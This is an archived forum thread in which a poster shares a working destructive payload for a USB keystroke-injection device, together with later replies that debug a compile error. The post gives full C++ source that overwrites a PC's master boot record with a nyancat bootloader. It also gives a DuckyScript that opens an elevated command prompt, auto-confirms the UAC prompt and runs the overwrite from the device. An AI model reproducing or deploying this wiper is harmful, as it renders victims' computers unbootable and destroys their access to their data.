Jump to content

Archived

This topic is now archived and is closed to further replies.

ThoughtfulDev

[DANGEROUS] Nyancat Bootloader Overwrite

Recommended Posts

Credits: https://github.com/brainsmoke/nyanmbr (he wrote a freaking bootloader with nyancat.. AMAZING)

I made a payload to overwrite your bootloader with the nyancat bootloader which will render your PC USELESS.

CAUTION: This will brick your bootloader. DO NOT TRY THIS on your OWN PC USE A VM

1. Download the precompiled boot.exe (source code is here if you want to compile yourself):

#include <windows.h>
#include <conio.h>
#include <iostream>

int main(int argc, char* argv[]){
	DWORD dw;
	char *pathToBin = "boot.bin";
	HANDLE drive = CreateFile("\\\\.\\PhysicalDrive0", GENERIC_ALL, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0);
	if (drive != INVALID_HANDLE_VALUE){
		HANDLE binary = CreateFile(pathToBin, GENERIC_READ, 0, 0, OPEN_EXISTING, 0, 0);
		if (binary != INVALID_HANDLE_VALUE){
			DWORD size = GetFileSize(binary, 0);
			if (size > 0){
				byte *mbr = new byte[size];
				if (ReadFile(binary, mbr, size, &dw, 0)){
					std::cout << "Binary file successfuly read!" << std::endl;
					if (WriteFile(drive, mbr, size, &dw, 0)){
						std::cout << "First sector overritten successfuly!" << std::endl;
					}
					else
						std::cerr << "Fatal error! Can't override 1st sector!" << std::endl;
				}
				else
					std::cerr << "Error reading from binary file!" << std::endl;
			}
			else
				std::cerr << "Invalid binary file!" << std::endl;
		}
		else{
			std::cerr << "Can't find the binary file to read from!" << std::endl;
		}
		CloseHandle(binary);
	}
	else
		std::cerr << "Administrator privileges required!" << std::endl;
	CloseHandle(drive);
    return 0;
}

2. Create Folder exec on your ducky sdcard and copy boot.exe into it.

3. Download the img file from https://github.com/brainsmoke/nyanmbr and rename it to boot.bin and put it in DUCKY\exec\boot.bin

4. Here is the duckyscript( make sure your sdcard is labeld: DUCKY):

REM I am NOT responsible for ANY DAMAGE
REM overwrites bootloader with https://github.com/brainsmoke/nyanmbr
DELAY 5000
ESCAPE
DELAY 500
CONTROL ESCAPE
DELAY 500
STRING cmd
DELAY 500
CTRL-SHIFT ENTER
DELAY 1000
REM replace with desired uac alt + key kombo (y for yes in english , j for german etc)
ALT y
DELAY 1500
STRING for /f %a in ('wmic logicaldisk get volumename^,name ^| find "DUCKY"') do %a
ENTER
DELAY 300
STRING cd exec
ENTER
DELAY 300
STRING boot.exe
ENTER
DELAY 1000
STRING exit
ENTER

 

I have also added this payload to my PyDuckGen (https://github.com/ThoughtfulDev/PyDuckGen) which makes generating payloads easier

 

boot.exe

Share this post


Link to post
Share on other sites

The code seems fine to me. Make sure you have boot.bin in the same location as the source file.

Share this post


Link to post
Share on other sites

Line 10 : HANDLE binary = CreateFile(pathToBin, GENERIC_READ, 0, 0, OPEN_EXISTING, 0, 0);
pathToBin
Error: argument of type "char *" is incompatible with parameter of type "LPCWSTR"

Share this post


Link to post
Share on other sites
4 hours ago, Neptunium said:

Error: argument of type "char *" is incompatible with parameter of type "LPCWSTR"

This isn't really the source code's problem, but an issue with your compiler configuration. I assume you're using Visual Studio, and if you are - you need to configure your project to use the Multi-Byte Character Set (Found in the project properties under the General section, iirc). You can alternatively cast to a LPCWSTR, but that isn't a better option.

I would recommend reading about the different character types that you will encounter in Windows C++ development here.

Share this post


Link to post
Share on other sites

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...